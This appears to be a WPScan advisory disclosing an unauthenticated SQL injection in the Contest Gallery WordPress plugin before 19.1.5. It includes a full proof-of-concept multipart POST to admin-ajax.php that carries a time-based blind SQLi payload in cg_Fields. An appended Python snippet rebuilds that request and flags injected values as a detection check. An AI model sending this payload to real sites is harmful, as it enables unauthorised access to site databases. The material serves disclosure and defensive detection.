wpvulndb | Daniel Krohmer | WPVDB-ID: 1B3B51AF-AD73-4F8E-BA97-375B8A363B64
History: Dec 05, 2022 - 12:00 a.m.

Contest Gallery < 19.1.5 - Unauthenticated SQL Injection

2022-12-05 00:00:00
Daniel Krohmer
wpscan.com
8
wordpress
sql injection
unauthenticated

EPSS

0.002

Percentile

60.0%

The plugin does not escape the cg_Fields POST parameter before concatenating it into an SQL query in users-registry-check-registering-and-login.php. This may allow malicious visitors to leak sensitive information from the site’s database.

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------22204028416237992052154109961
Content-Length: 3796
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/?p=1
Cookie: wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_current_page_id"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_check"

63e2eac15c3548881b7e582f807cb491fc9b8c0cb7a61631580a8db22fa29d70
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="action"

post_cg_registry
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_gallery_id_registry"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Form_Input_ID]"

1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Type]"

user-check-agreement-field
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Order]"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[1][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Form_Input_ID]"

2
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Type]"

main-nick-name
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Order]"

1
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[2][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Form_Input_ID]"

3
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Type]"

main-mail
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Order]"

2
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[3][Field_Content]"

[email protected]
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Form_Input_ID]"

4
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Type]"

password
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Order]"

3
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[4][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Form_Input_ID]"

5
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Type]"

password-confirm
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Order]"

4
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg_Fields[5][Field_Content]"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-mail"

[email protected]
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-user-name"

testing
-----------------------------22204028416237992052154109961
Content-Disposition: form-data; name="cg-main-nick-name"

testing
-----------------------------22204028416237992052154109961--
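As an added example (not from the advisory or the plugin): a small parser for the multipart body shape shown in the PoC, plus a check that flags cg_Fields slots which the registration form only ever fills with integers (Form_Input_ID, Field_Order). The sample body is constructed here; the admin-ajax action name and field names are taken from the PoC, and the boundary string is illustrative.

```python
import re

# Constructed sample in the shape of the advisory's PoC (boundary is illustrative).
BOUNDARY = "---------------------------22204028416237992052154109961"
POC_FIELDS = [
    ("action", "post_cg_registry"),
    ("cg_gallery_id_registry", "1"),
    ("cg_Fields[1][Form_Input_ID]",
     "1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)"),
    ("cg_Fields[1][Field_Type]", "user-check-agreement-field"),
    ("cg_Fields[1][Field_Order]", "1"),
    ("cg_Fields[1][Field_Content]", "testing"),
]

def build_body(fields, boundary=BOUNDARY):
    """Assemble a multipart/form-data body from (name, value) pairs."""
    parts = [f'--{boundary}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
             for n, v in fields]
    return "".join(parts) + f"--{boundary}--\r\n"

def parse_multipart(body, boundary=BOUNDARY):
    """Return {name: value} for the text parts of a multipart/form-data body."""
    fields = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":          # preamble or closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        m = re.search(r';\s*name="([^"]*)"', headers)
        if m:
            fields[m.group(1)] = value
    return fields

# Slots of cg_Fields that the form only ever fills with small integers.
NUMERIC_SLOT = re.compile(r"^cg_Fields\[\d+\]\[(Form_Input_ID|Field_Order)\]$")
SQL_TOKENS = re.compile(r"/\*|\*/|--|\bSLEEP\s*\(|\bSELECT\b|\bUNION\b|'", re.I)

def find_suspicious(fields):
    """Flag numeric cg_Fields slots that are not plain integers; free-text slots
    such as Field_Content are ignored so ordinary quotes do not trip the check."""
    if fields.get("action") != "post_cg_registry":
        return []
    findings = []
    for name, value in fields.items():
        if NUMERIC_SLOT.match(name) and not value.strip().isdigit():
            reason = "sql-like tokens" if SQL_TOKENS.search(value) else "non-integer"
            findings.append((name, reason))
    return findings
```

Run `find_suspicious(parse_multipart(build_body(POC_FIELDS)))` to see the PoC's Form_Input_ID slot flagged; the same structural check (integer or reject) is what the server-side handler should enforce before the value ever reaches a query.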
